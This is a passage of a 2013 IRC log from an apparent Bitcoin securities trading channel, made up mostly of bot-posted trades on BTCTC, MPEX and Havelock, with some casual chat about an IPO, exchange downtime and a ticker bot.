0.02364 = 0.1418 BTC [-] Aug 10 01:04:43 [BTCTC] [DMS.SELLING] 5 @ 0.02364 = 0.1182 BTC [-] Aug 10 01:04:43 [BTCTC] [DMS.PURCHASE] 11 @ 0.02817 = 0.3099 BTC [-] Aug 10 01:05:22 [BTCTC] [DMS.SELLING] 11 @ 0.02364 = 0.26 BTC [-] Aug 10 01:05:24 [BTCTC] [DMS.PURCHASE] 11 @ 0.02817 = 0.3099 BTC [-] Aug 10 01:05:58 [BTCTC] [BTCGARDEN] 123 @ 0.016 = 1.968 BTC [+] Aug 10 01:21:22 [BTCTC] [NASTY-PT] 25 @ 0.004168 = 0.1042 BTC [+] Aug 10 01:26:39 [BTCTC] [ASICMINER-PT] 1 @ 3.873 BTC [+] Aug 10 01:29:46 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002301 BTC [-] Aug 10 01:29:46 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002301 = 0.0005 BTC [-] Aug 10 01:30:01 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002301 = 0.023 BTC [-] Aug 10 01:30:42 [BTCTC] [TAT.MINIGAME] 203 @ 0.00023 = 0.0467 BTC [-] Aug 10 01:31:35 [BTCTC] [LABCOIN] 3 @ 0.001394 = 0.0042 BTC [-] Aug 10 01:31:37 [BTCTC] [LABCOIN] 420 @ 0.001378 = 0.5788 BTC [-] Aug 10 01:31:38 [BTCTC] [LABCOIN] 1 @ 0.001372 BTC [-] Aug 10 01:31:39 [BTCTC] [LABCOIN] 1 @ 0.00135 BTC [-] Aug 10 01:31:40 [BTCTC] [LABCOIN] 3 @ 0.001333 = 0.004 BTC [-] Aug 10 01:31:42 [BTCTC] [LABCOIN] 3 @ 0.001332 = 0.004 BTC [-] Aug 10 01:31:43 [BTCTC] [LABCOIN] 30 @ 0.001331 = 0.0399 BTC [-] Aug 10 01:31:44 [BTCTC] [LABCOIN] 1 @ 0.001329 BTC [-] Aug 10 01:31:44 [BTCTC] [LABCOIN] 21 @ 0.001326 = 0.0278 BTC [-] Aug 10 01:31:45 [BTCTC] [LABCOIN] 1 @ 0.001326 BTC [-] Aug 10 01:31:47 [BTCTC] [LABCOIN] 100 @ 0.001325 = 0.1325 BTC [-] Aug 10 01:31:48 [BTCTC] [LABCOIN] 72 @ 0.001325 = 0.0954 BTC [-] Aug 10 01:31:49 [BTCTC] [LABCOIN] 1710 @ 0.001313 = 2.2452 BTC [-] Aug 10 01:31:50 [BTCTC] [LABCOIN] 214 @ 0.001312 = 0.2808 BTC [-] Aug 10 01:31:51 [BTCTC] [LABCOIN] 30 @ 0.001304 = 0.0391 BTC [-] Aug 10 01:31:52 [BTCTC] [LABCOIN] 52 @ 0.001304 = 0.0678 BTC [-] Aug 10 01:31:53 [BTCTC] [LABCOIN] 170 @ 0.001303 = 0.2215 BTC [-] Aug 10 01:31:54 [BTCTC] [LABCOIN] 250 @ 0.001302 = 0.3255 BTC [-] Aug 10 01:31:54 [BTCTC] [LABCOIN] 1 @ 0.001302 BTC [-] Aug 10 01:31:56 [BTCTC] [LABCOIN] 111 @ 0.001301 = 0.1444 BTC [-] Aug 10 01:31:56 [BTCTC] [LABCOIN] 500 @ 0.0013 = 0.65 BTC [-] Aug 10 01:31:58 [BTCTC] [LABCOIN] 394 @ 0.0013 = 0.5122 BTC [-] Aug 10 01:31:59 [BTCTC] [LABCOIN] 31 @ 0.001292 = 0.0401 BTC [-] Aug 10 01:32:00 [BTCTC] [LABCOIN] 250 @ 0.001291 = 0.3228 BTC [-] Aug 10 01:32:01 [BTCTC] [LABCOIN] 1 @ 0.001289 BTC [-] Aug 10 01:32:02 [BTCTC] [LABCOIN] 5 @ 0.001279 = 0.0064 BTC [-] Aug 10 01:32:03 [BTCTC] [LABCOIN] 40 @ 0.001278 = 0.0511 BTC [-] Aug 10 01:32:04 [BTCTC] [LABCOIN] 304 @ 0.001275 = 0.3876 BTC [-] Aug 10 01:32:05 [BTCTC] [LABCOIN] 864 @ 0.001274 = 1.1007 BTC [-] Aug 10 01:32:05 [BTCTC] [LABCOIN] 1 @ 0.001274 BTC [-] Aug 10 01:32:07 [BTCTC] [LABCOIN] 2000 @ 0.001273 = 2.546 BTC [-] Aug 10 01:32:07 [BTCTC] [LABCOIN] 429 @ 0.001273 = 0.5461 BTC [-] Aug 10 01:32:08 [BTCTC] [LABCOIN] 1700 @ 0.001272 = 2.1624 BTC [-] Aug 10 01:32:09 [BTCTC] [LABCOIN] 3000 @ 0.001271 = 3.813 BTC [-] Aug 10 01:32:10 [BTCTC] [LABCOIN] 1267 @ 0.001271 = 1.6104 BTC [-] Aug 10 01:32:11 [BTCTC] [LABCOIN] 5000 @ 0.00127 = 6.35 BTC [-] Aug 10 01:32:12 [BTCTC] [LABCOIN] 5000 @ 0.00127 = 6.35 BTC [-] Aug 10 01:32:13 [BTCTC] [LABCOIN] 140 @ 0.001269 = 0.1777 BTC [-] Aug 10 01:32:13 [BTCTC] [LABCOIN] 919 @ 0.001268 = 1.1653 BTC [-] Aug 10 01:32:15 [BTCTC] [LABCOIN] 3333 @ 0.001267 = 4.2229 BTC [-] Aug 10 01:32:16 [BTCTC] [LABCOIN] 2000 @ 0.001267 = 2.534 BTC [-] Aug 10 01:32:17 [BTCTC] [LABCOIN] 2020 @ 0.001266 = 2.5573 BTC [-] Aug 10 01:32:18 [BTCTC] [LABCOIN] 16 @ 0.001259 = 0.0201 BTC [-] Aug 10 01:32:19 [BTCTC] [LABCOIN] 130 @ 0.001258 = 0.1635 BTC [-] Aug 10 01:32:20 [BTCTC] [LABCOIN] 121 @ 0.001253 = 0.1516 BTC [-] Aug 10 01:32:21 [BTCTC] [LABCOIN] 2345 @ 0.001252 = 2.9359 BTC [-] Aug 10 01:32:22 [BTCTC] [LABCOIN] 1371 @ 0.001252 = 1.7165 BTC [-] Aug 10 01:32:23 [BTCTC] [LABCOIN] 3000 @ 0.001251 = 3.753 BTC [-] Aug 10 01:32:24 [BTCTC] [LABCOIN] 10000 @ 0.00125 = 12.5 BTC [-] Aug 10 01:32:24 [BTCTC] [LABCOIN] 3333 @ 0.00124 = 4.1329 BTC [-] Aug 10 01:32:25 [BTCTC] [LABCOIN] 1400 @ 0.001239 = 1.7346 BTC [-] Aug 10 01:32:26 [BTCTC] [LABCOIN] 20 @ 0.001237 = 0.0247 BTC [-] Aug 10 01:32:27 [BTCTC] [LABCOIN] 1444 @ 0.001235 = 1.7833 BTC [-] Aug 10 01:32:28 [BTCTC] [LABCOIN] 2777 @ 0.001235 = 3.4296 BTC [-] Aug 10 01:32:29 [BTCTC] [LABCOIN] 300 @ 0.001233 = 0.3699 BTC [-] Aug 10 01:32:30 [BTCTC] [LABCOIN] 1350 @ 0.00123 = 1.6605 BTC [-] Aug 10 01:32:31 [BTCTC] [LABCOIN] 2000 @ 0.00123 = 2.46 BTC [-] Aug 10 01:32:32 [BTCTC] [LABCOIN] 175 @ 0.001225 = 0.2144 BTC [-] Aug 10 01:32:33 [BTCTC] [LABCOIN] 2000 @ 0.001225 = 2.45 BTC [-] Aug 10 01:32:34 [BTCTC] [LABCOIN] 4344 @ 0.001223 = 5.3127 BTC [-] Aug 10 01:32:35 [BTCTC] [LABCOIN] 4000 @ 0.001216 = 4.864 BTC [-] Aug 10 01:32:36 [BTCTC] [LABCOIN] 13000 @ 0.001215 = 15.795 BTC [-] Aug 10 01:32:37 [BTCTC] [LABCOIN] 5000 @ 0.001214 = 6.07 BTC [-] Aug 10 01:32:38 [BTCTC] [LABCOIN] 2000 @ 0.001213 = 2.426 BTC [-] Aug 10 01:32:39 [BTCTC] [LABCOIN] 7000 @ 0.001213 = 8.491 BTC [-] Aug 10 01:32:40 [BTCTC] [LABCOIN] 2000 @ 0.001212 = 2.424 BTC [-] Aug 10 01:32:41 [BTCTC] [LABCOIN] 2500 @ 0.001212 = 3.03 BTC [-] Aug 10 01:32:42 [BTCTC] [LABCOIN] 6666 @ 0.001212 = 8.0792 BTC [-] Aug 10 01:32:43 [BTCTC] [LABCOIN] 10000 @ 0.00121 = 12.1 BTC [-] Aug 10 01:32:44 [BTCTC] [LABCOIN] 966 @ 0.001209 = 1.1679 BTC [-] Aug 10 01:32:45 [BTCTC] [NASTY-PT] 15 @ 0.004168 = 0.0625 BTC [+] Aug 10 01:32:47 Woah. Aug 10 01:36:34 ;;nethash Aug 10 01:36:34 383386.010186 Aug 10 01:49:59 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [+] Aug 10 01:52:36 ;;calc 999000*1000/1000000000 Aug 10 01:52:37 0.999 Aug 10 01:53:45 [BTCTC] [ACTIVEMINING] 4 @ 0.005619 = 0.0225 BTC [+] Aug 10 01:57:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0384 = 0.0768 BTC [+] Aug 10 01:58:46 O Yaye I can transfer ny nasty shares to btct now Aug 10 01:59:50 [BTCTC] [LABCOIN] 3 @ 0.001356 = 0.0041 BTC [+] Aug 10 02:10:26 [BTCTC] [LABCOIN] 1 @ 0.001358 BTC [+] Aug 10 02:12:33 [BTCTC] [LABCOIN] 70 @ 0.001343 = 0.094 BTC [-] Aug 10 02:14:13 [BTCTC] [DMS.SELLING] 65 @ 0.02428 = 1.5782 BTC [+] Aug 10 02:18:31 [BTCTC] [CB.IDIFF-O] 52 @ 0.0095 = 0.494 BTC [+] Aug 10 02:19:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0381 BTC [-] Aug 10 02:24:34 [BTCTC] [LABCOIN] 5 @ 0.001337 = 0.0067 BTC [-] Aug 10 02:26:02 [MPEX] [S.MPOE] 9371 @ 0.00083209 = 7.7975 BTC [-] Aug 10 02:34:19 [BTCTC] [ASICMINER-PT] 1 @ 3.755 BTC [-] Aug 10 02:36:00 [BTCTC] [BMF] 50 @ 0.033 = 1.65 BTC [-] Aug 10 02:36:02 [BTCTC] [BMF] 43 @ 0.032 = 1.376 BTC [-] Aug 10 02:36:30 [BTCTC] [NASTY-PT] 250 @ 0.004168 = 1.042 BTC [+] Aug 10 02:39:41 [BTCTC] [DMS.SELLING] 16 @ 0.02428 = 0.3885 BTC [+] Aug 10 02:39:42 [BTCTC] [DMS.SELLING] 50 @ 0.02429 = 1.2145 BTC [+] Aug 10 02:40:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.03735 = 0.3735 BTC [-] Aug 10 02:41:16 [BTCTC] [LABCOIN] 30 @ 0.001328 = 0.0398 BTC [-] Aug 10 02:41:17 [BTCTC] [LABCOIN] 235 @ 0.001327 = 0.3118 BTC [-] Aug 10 02:41:19 [BTCTC] [LABCOIN] 20 @ 0.001317 = 0.0263 BTC [-] Aug 10 02:41:20 [BTCTC] [LABCOIN] 9 @ 0.001296 = 0.0117 BTC [-] Aug 10 02:41:21 [BTCTC] [LABCOIN] 1060 @ 0.001295 = 1.3727 BTC [-] Aug 10 02:41:22 [BTCTC] [LABCOIN] 50 @ 0.001281 = 0.0641 BTC [-] Aug 10 02:41:23 [BTCTC] [LABCOIN] 73 @ 0.001262 = 0.0921 BTC [-] Aug 10 02:41:24 [BTCTC] [LABCOIN] 100 @ 0.00126 = 0.126 BTC [-] Aug 10 02:41:26 [BTCTC] [LABCOIN] 500 @ 0.001252 = 0.626 BTC [-] Aug 10 02:41:27 [BTCTC] [LABCOIN] 766 @ 0.00123 = 0.9422 BTC [-] Aug 10 02:41:32 [BTCTC] [TAT.ASICMINER] 10 @ 0.03734 = 0.3734 BTC [-] Aug 10 02:42:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.03734 = 0.3734 BTC [-] Aug 10 02:42:32 [BTCTC] [TAT.ASICMINER] 13 @ 0.03735 = 0.4856 BTC [+] Aug 10 02:46:07 lol at that joke of an ipo on btct, sandstorm Aug 10 02:46:29 so vague Aug 10 02:46:30 "The creator of Sandstorm has been creating wealth through BTC related activities for a long time." Aug 10 02:49:39 [BTCTC] [ASICMINER-PT] 1 @ 3.764 BTC [+] Aug 10 02:49:41 [BTCTC] [ASICMINER-PT] 1 @ 3.763 BTC [-] Aug 10 02:50:19 [BTCTC] [TAT.ASICMINER] 52 @ 0.03737 = 1.9432 BTC [+] Aug 10 02:56:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005501 = 0.165 BTC [-] Aug 10 02:56:12 [BTCTC] [ACTIVEMINING] 2000 @ 0.0055 = 11 BTC [-] Aug 10 02:57:00 [BTCTC] [LABCOIN] 10 @ 0.001292 = 0.0129 BTC [+] Aug 10 02:59:26 [BTCTC] [LABCOIN] 15 @ 0.001289 = 0.0193 BTC [-] Aug 10 02:59:27 [BTCTC] [LABCOIN] 20 @ 0.00129 = 0.0258 BTC [+] Aug 10 03:00:12 [BTCTC] [LABCOIN] 31 @ 0.001291 = 0.04 BTC [+] Aug 10 03:05:44 [BTCTC] [NASTY-PT] 10 @ 0.0035 = 0.035 BTC [-] Aug 10 03:05:45 [BTCTC] [NASTY-PT] 13 @ 0.00363 = 0.0472 BTC [+] Aug 10 03:05:46 [BTCTC] [NASTY-PT] 25 @ 0.003733 = 0.0933 BTC [+] Aug 10 03:05:48 [BTCTC] [NASTY-PT] 33 @ 0.0038 = 0.1254 BTC [+] Aug 10 03:05:48 [BTCTC] [NASTY-PT] 29 @ 0.00395 = 0.1146 BTC [+] Aug 10 03:07:18 [BTCTC] [BTCGARDEN] 50 @ 0.0158 = 0.79 BTC [-] Aug 10 03:08:29 [BTCTC] [BASIC-MINING] 4 @ 0.2979 = 1.1916 BTC [+] Aug 10 03:08:30 [BTCTC] [BASIC-MINING] 1 @ 0.298 BTC [+] Aug 10 03:10:37 [BTCTC] [ASICMINER-PT] 2 @ 3.799 = 7.598 BTC [+] Aug 10 03:14:16 [BTCTC] [ACTIVEMINING] 68 @ 0.005683 = 0.3864 BTC [+] Aug 10 03:14:19 [BTCTC] [ACTIVEMINING] 30 @ 0.005684 = 0.1705 BTC [+] Aug 10 03:14:26 [BTCTC] [ACTIVEMINING] 13 @ 0.005684 = 0.0739 BTC [+] Aug 10 03:17:40 [BTCTC] [ACTIVEMINING] 249 @ 0.005684 = 1.4153 BTC [+] Aug 10 03:23:17 [BTCTC] [ACTIVEMINING] 1 @ 0.005681 BTC [-] Aug 10 03:23:57 [BTCTC] [ACTIVEMINING] 6 @ 0.005681 = 0.0341 BTC [-] Aug 10 03:27:33 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002412 BTC [+] Aug 10 03:28:07 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002412 = 0.0024 BTC [+] Aug 10 03:35:43 [BTCTC] [ACTIVEMINING] 5 @ 0.005664 = 0.0283 BTC [-] Aug 10 03:38:26 [BTCTC] [ACTIVEMINING] 15 @ 0.005662 = 0.0849 BTC [-] Aug 10 03:38:33 [BTCTC] [ACTIVEMINING] 13 @ 0.005662 = 0.0736 BTC [-] Aug 10 03:39:34 [BTCTC] [LABCOIN] 4 @ 0.001313 = 0.0053 BTC [+] Aug 10 03:41:39 [BTCTC] [LABCOIN] 500 @ 0.00131 = 0.655 BTC [-] Aug 10 03:42:15 [BTCTC] [LABCOIN] 2 @ 0.00131 = 0.0026 BTC [-] Aug 10 03:43:28 [BTCTC] [LABCOIN] 60 @ 0.001297 = 0.0778 BTC [-] Aug 10 03:45:30 [BTCTC] [DMS.MINING] 11 @ 0.004301 = 0.0473 BTC [-] Aug 10 03:45:36 [BTCTC] [DMS.MINING] 30 @ 0.004301 = 0.129 BTC [-] Aug 10 03:45:41 [BTCTC] [DMS.MINING] 235 @ 0.0043 = 1.0105 BTC [-] Aug 10 03:45:43 [BTCTC] [DMS.MINING] 50 @ 0.0042 = 0.21 BTC [-] Aug 10 03:45:44 [BTCTC] [DMS.MINING] 74 @ 0.004121 = 0.305 BTC [-] Aug 10 03:48:39 [BTCTC] [LABCOIN] 2 @ 0.001316 = 0.0026 BTC [+] Aug 10 03:51:22 [BTCTC] [ACTIVEMINING] 6 @ 0.005683 = 0.0341 BTC [+] Aug 10 03:51:25 [BTCTC] [ACTIVEMINING] 11 @ 0.005684 = 0.0625 BTC [+] Aug 10 03:51:26 [BTCTC] [ACTIVEMINING] 35 @ 0.005686 = 0.199 BTC [+] Aug 10 03:55:05 [BTCTC] [ACTIVEMINING] 6 @ 0.005685 = 0.0341 BTC [-] Aug 10 03:59:24 [BTCTC] [ACTIVEMINING] 12 @ 0.005684 = 0.0682 BTC [-] Aug 10 04:06:45 [MPEX] [S.MPOE] 4476 @ 0.00083311 = 3.729 BTC [+] Aug 10 04:06:47 [MPEX] [S.MPOE] 10603 @ 0.00083436 = 8.8467 BTC [+] Aug 10 04:16:20 anyone else having issues connecting to havelock? Aug 10 04:20:37 yes, for hours Aug 10 04:22:58 [BTCTC] [LABCOIN] 6 @ 0.001314 = 0.0079 BTC [-] Aug 10 04:22:59 [BTCTC] [LABCOIN] 2 @ 0.001314 = 0.0026 BTC [-] Aug 10 04:24:17 [BTCTC] [LABCOIN] 6 @ 0.001315 = 0.0079 BTC [+] Aug 10 04:24:54 [BTCTC] [LABCOIN] 6 @ 0.001315 = 0.0079 BTC [+] Aug 10 04:25:41 [BTCTC] [ACTIVEMINING] 4 @ 0.005676 = 0.0227 BTC [-] Aug 10 04:25:44 [BTCTC] [LABCOIN] 8 @ 0.001316 = 0.0105 BTC [+] Aug 10 04:26:17 [BTCTC] [ACTIVEMINING] 4 @ 0.005676 = 0.0227 BTC [-] Aug 10 04:28:17 [BTCTC] [ACTIVEMINING] 4 @ 0.005676 = 0.0227 BTC [-] Aug 10 04:32:27 [BTCTC] [BASIC-MINING] 7 @ 0.298 = 2.086 BTC [+] Aug 10 04:32:51 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [+] **** BEGIN LOGGING AT Sat Aug 10 12:31:15 2013 Aug 10 12:33:49 [BTCTC] [ASICMINER-PT] 1 @ 3.825 BTC [-] Aug 10 12:37:43 [MPEX] [S.MPOE] 2810 @ 0.00083481 = 2.3458 BTC [+] Aug 10 12:37:45 [MPEX] [S.MPOE] 12440 @ 0.00083864 = 10.4327 BTC [+] Aug 10 12:43:20 [BTCTC] [BTCGARDEN] 12 @ 0.01587 = 0.1904 BTC [-] Aug 10 12:47:33 [BTCTC] [CRYPTO-TRADE] 1 @ 0.194 BTC [+] Aug 10 12:47:34 [BTCTC] [CRYPTO-TRADE] 1 @ 0.194 BTC [+] Aug 10 12:47:36 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1939 BTC [-] Aug 10 12:47:37 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1937 BTC [-] Aug 10 13:07:13 [MPEX] [S.MPOE] 18850 @ 0.00083864 = 15.8084 BTC [+] Aug 10 13:16:19 [BTCTC] [NASTY-PT] 2 @ 0.004148 = 0.0083 BTC [+] Aug 10 13:22:53 [BTCTC] [BTC-TRADING-PT] 1 @ 0.7 BTC [+] Aug 10 13:33:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.03818 BTC [+] Aug 10 13:36:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03817 BTC [-] Aug 10 13:37:22 [BTCTC] [LABCOIN] 3 @ 0.001325 = 0.004 BTC [+] Aug 10 13:37:53 [BTCTC] [LABCOIN] 7 @ 0.001329 = 0.0093 BTC [+] Aug 10 13:38:15 [BTCTC] [LABCOIN] 1 @ 0.001329 BTC [+] Aug 10 13:39:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005593 = 0.1678 BTC [-] Aug 10 13:39:26 [BTCTC] [ACTIVEMINING] 20 @ 0.005592 = 0.1118 BTC [-] Aug 10 13:42:45 [MPEX] [S.MPOE] 9100 @ 0.00083832 = 7.6287 BTC [-] Aug 10 13:42:46 [MPEX] [S.MPOE] 4160 @ 0.00083864 = 3.4887 BTC [+] Aug 10 13:42:48 [MPEX] [S.MPOE] 5840 @ 0.00083964 = 4.9035 BTC [+] Aug 10 13:50:31 http://techcrunch.com/2013/08/09/bitcoin-ticker-available-on-bloomberg-terminal/ Aug 10 13:50:33 Bitcoin Ticker Available On Bloomberg Terminal For Employees | TechCrunch Aug 10 13:59:30 HELLO GUYS Aug 10 13:59:43 !help Aug 10 13:59:43 List of commands: Aug 10 13:59:44 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Aug 10 13:59:45 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Aug 10 13:59:46 !mp (desc: returns the response from MPEX order) Aug 10 13:59:47 !rules (desc: chan guidelines) {short: !r} Aug 10 13:59:48 !exchanges (desc: lists exchanges and brokers) {short: !e} Aug 10 14:00:18 !ticker BUY-A-HASH Aug 10 14:00:19 Are you sure you have no tobacco? Aug 10 14:00:40 !ticker BUY-A-HASH Dividends Aug 10 14:00:40 Aren't those tins of tobacco right there behind you? Aug 10 14:00:48 !ticker no Aug 10 14:00:49 Are you sure you have no tobacco? Aug 10 14:00:55 [BTCTC] [KENILWORTH] 10 @ 0.001689 = 0.0169 BTC [-] Aug 10 14:02:03 [BTCTC] [LABCOIN] 1 @ 0.001311 BTC [-] Aug 10 14:03:55 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 10 14:04:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.0382 = 0.0764 BTC [+] Aug 10 14:04:48 CoolShades, BUY-A-HASH is a LTC company and trades at litecoinglobal Aug 10 14:04:48 [HAVELOCK] [AM100] 10 @ 0.0363 = 0.363 BTC [-] Aug 10 14:05:25 [HAVELOCK] [AM100] 40 @ 0.0363999 = 1.456 BTC [+] Aug 10 14:06:53 [BTCTC] [LABCOIN] 3 @ 0.001325 = 0.004 BTC [+] Aug 10 14:08:13 [BTCTC] [LABCOIN] 3 @ 0.001329 = 0.004 BTC [+] Aug 10 14:14:48 virtuals too late, he quit. Aug 10 14:14:52 noobs thing irc is a webpage. Aug 10 14:14:59 lol Aug 10 14:15:09 kinda funny hehe Aug 10 14:15:12 noobs think everything is a webpage Aug 10 14:15:48 mhm Aug 10 14:15:56 god speaks CSS Aug 10 14:17:56 lol Aug 10 14:22:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0021 BTC [+] Aug 10 14:22:47 http://www.youtube.com/watch?v=LQWTTOm6loM Aug 10 14:22:53 err wrong chan Aug 10 14:22:54 Water Bombing Trans- Lab highway truck fire - YouTube Aug 10 14:23:27 [BTCTC] [LABCOIN] 3 @ 0.001325 = 0.004 BTC [-] Aug 10 14:23:40 [MPEX] [S.MPOE] 9379 @ 0.00083831 = 7.8625 BTC [-] Aug 10 14:24:49 [HAVELOCK] [SMG] 10 @ 0.000208 = 0.0021 BTC [+] Aug 10 14:26:13 [HAVELOCK] [SMG] 10 @ 0.000208 = 0.0021 BTC [+] Aug 10 14:27:47 [BTCTC] [ASICMINER-PT] 1 @ 3.799 BTC [-] Aug 10 14:28:30 [HAVELOCK] [SMG] 6 @ 0.000208 = 0.0012 BTC [+] Aug 10 14:29:50 aww dammit #css is taken Aug 10 14:31:58 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002097 = 0.0042 BTC [-] Aug 10 14:39:22 [MPEX] [S.MPOE] 9421 @ 0.00083831 = 7.8977 BTC [-] Aug 10 14:39:24 [MPEX] [S.MPOE] 5179 @ 0.00083373 = 4.3179 BTC [-] Aug 10 14:41:33 [BTCTC] [ACTIVEMINING] 30 @ 0.005593 = 0.1678 BTC [+] Aug 10 14:44:18 [BTCTC] [ACTIVEMINING] 30 @ 0.005595 = 0.1679 BTC [+] Aug 10 14:46:29 [BTCTC] [LABCOIN] 3 @ 0.001325 = 0.004 BTC [-] Aug 10 14:46:31 [BTCTC] [LABCOIN] 49 @ 0.001311 = 0.0642 BTC [-] Aug 10 14:46:32 [BTCTC] [LABCOIN] 7 @ 0.001311 = 0.0092 BTC [-] Aug 10 14:46:33 [BTCTC] [LABCOIN] 5 @ 0.00131 = 0.0066 BTC [-] Aug 10 14:46:34 [BTCTC] [LABCOIN] 10 @ 0.001309 = 0.0131 BTC [-] Aug 10 14:47:23 [BTCTC] [LABCOIN] 26 @ 0.001309 = 0.034 BTC [-] Aug 10 14:50:26 [BTCTC] [ACTIVEMINING] 30 @ 0.005679 = 0.1704 BTC [+] Aug 10 14:54:59 [BTCTC] [LABCOIN] 10 @ 0.001328 = 0.0133 BTC [+] Aug 10 14:55:26 [MPEX] [S.MG] 700 @ 0.00020002 = 0.14 BTC [-] Aug 10 14:55:28 [MPEX] [S.MG] 5000 @ 0.00020001 = 1.0001 BTC [-] Aug 10 14:55:29 [MPEX] [S.MG] 10000 @ 0.00019 = 1.9 BTC [-] Aug 10 14:55:31 [MPEX] [S.MG] 1000 @ 0.00018111 = 0.1811 BTC [-] Aug 10 14:55:34 [MPEX] [S.MG] 8300 @ 0.00018 = 1.494 BTC [-] Aug 10 14:59:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.0382 = 0.382 BTC [+] Aug 10 15:00:01 [HAVELOCK] [XBOND] [PAID] 1.00931000 BTC to 2`018`620 shares, 50 satoshi per share Aug 10 15:00:53 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002251 BTC [-] Aug 10 15:06:35 [HAVELOCK] [AM1] 1 @ 3.8 BTC [-] Aug 10 15:06:53 [HAVELOCK] [AM100] 1 @ 0.0356 BTC [-] Aug 10 15:07:26 [HAVELOCK] [AM100] 5 @ 0.0355 = 0.1775 BTC [-] Aug 10 15:07:52 [HAVELOCK] [AM100] 10 @ 0.035 = 0.35 BTC [-] Aug 10 15:08:15 [HAVELOCK] [AM100] 10 @ 0.0349 = 0.349 BTC [-] Aug 10 15:08:48 [HAVELOCK] [AM100] 1 @ 0.0348 BTC [-] Aug 10 15:08:50 [HAVELOCK] [AM100] 9 @ 0.0346 = 0.3114 BTC [-] Aug 10 15:17:29 kakobrekla https://bitcointalk.org/index.php?topic=270716.0 Aug 10 15:19:09 [HAVELOCK] [XBOND] 1 @ 0.00104498 BTC [-] Aug 10 15:19:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001945 BTC [-] Aug 10 15:21:39 [BTCTC] [BITVPS] 5 @ 0.001999 = 0.01 BTC [-] Aug 10 15:28:42 [HAVELOCK] [AM100] 1 @ 0.0363 BTC [+] Aug 10 15:34:02 [BTCTC] [ASICMINER-PT] 1 @ 3.785 BTC [-] **** ENDING LOGGING AT Sat Aug 10 15:44:35 2013 **** BEGIN LOGGING AT Sat Aug 10 15:45:58 2013 Aug 10 15:47:02 [BTCTC] [ACTIVEMINING] 30 @ 0.005595 = 0.1679 BTC [-] Aug 10 15:52:20 [HAVELOCK] [SDSTM] 21 @ 0.0055021 = 0.1155 BTC [-] Aug 10 15:52:20 [BTCTC] [BITVPS] 1 @ 0.002036 BTC [+] Aug 10 15:52:21 [HAVELOCK] [SMG] 95 @ 0.000207 = 0.0197 BTC [-] Aug 10 15:52:22 [HAVELOCK] [SDSTM] 2 @ 0.0055021 = 0.011 BTC [-] Aug 10 15:54:28 [BTCTC] [DMS.SELLING] 1 @ 0.02444 BTC [+] Aug 10 15:54:29 [BTCTC] [DMS.SELLING] 19 @ 0.02445 = 0.4646 BTC [+] Aug 10 15:55:27 [HAVELOCK] [SMG] 165 @ 0.0002021 = 0.0333 BTC [-] Aug 10 15:56:22 [BTCTC] [DMS.PURCHASE] 3 @ 0.02817 = 0.0845 BTC [-] Aug 10 15:58:06 [BTCTC] [BTCGARDEN] 27 @ 0.01606 = 0.4336 BTC [+] Aug 10 16:08:28 [BTCTC] [TAT.MINIGAME] 7 @ 0.0002412 = 0.0017 BTC [+] Aug 10 16:14:01 [BTCTC] [TAT.MINIGAME] 42 @ 0.0002412 = 0.0101 BTC [+] Aug 10 16:14:03 [MPEX] [S.MPOE] 1363 @ 0.00083188 = 1.1339 BTC [-] Aug 10 16:14:05 [MPEX] [S.MPOE] 4737 @ 0.00083073 = 3.9352 BTC [-] Aug 10 16:15:52 [BTCTC] [LABCOIN] 10 @ 0.00132 = 0.0132 BTC [-] Aug 10 16:26:12 [BTCTC] [DMS.PURCHASE] 1 @ 0.02817 BTC [-] Aug 10 16:26:16 [HAVELOCK] [HIM] 20 @ 0.120001 = 2.4 BTC [-] Aug 10 16:28:24 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [-] Aug 10 16:30:17 [BTCTC] [LABCOIN] 19 @ 0.001329 = 0.0253 BTC [+] Aug 10 16:30:44 [BTCTC] [DMS.SELLING] 50 @ 0.0239 = 1.195 BTC [-] Aug 10 16:30:46 [BTCTC] [DMS.SELLING] 50 @ 0.02381 = 1.1905 BTC [-] Aug 10 16:30:47 [BTCTC] [DMS.SELLING] 30 @ 0.0238 = 0.714 BTC [-] Aug 10 16:30:48 [BTCTC] [DMS.SELLING] 50 @ 0.0237 = 1.185 BTC [-] Aug 10 16:30:49 [BTCTC] [DMS.SELLING] 45 @ 0.0237 = 1.0665 BTC [-] Aug 10 16:31:01 [BTCTC] [LABCOIN] 4 @ 0.00133 = 0.0053 BTC [+] Aug 10 16:31:52 [BTCTC] [NASTY-PT] 1 @ 0.004148 BTC [+] Aug 10 16:32:50 [BTCTC] [LABCOIN] 2 @ 0.001329 = 0.0027 BTC [-] Aug 10 16:37:42 [HAVELOCK] [AM100] 1 @ 0.0363 BTC [+] Aug 10 16:38:31 [BTCTC] [DMS.SELLING] 2 @ 0.02361 = 0.0472 BTC [-] Aug 10 16:38:32 [BTCTC] [DMS.SELLING] 1 @ 0.0235 BTC [-] Aug 10 16:42:39 [BTCTC] [DMS.MINING] 5 @ 0.004369 = 0.0218 BTC [-] Aug 10 16:42:41 [BTCTC] [DMS.MINING] 98 @ 0.00437 = 0.4283 BTC [+] Aug 10 16:43:40 [BTCTC] [DMS.MINING] 10 @ 0.004555 = 0.0456 BTC 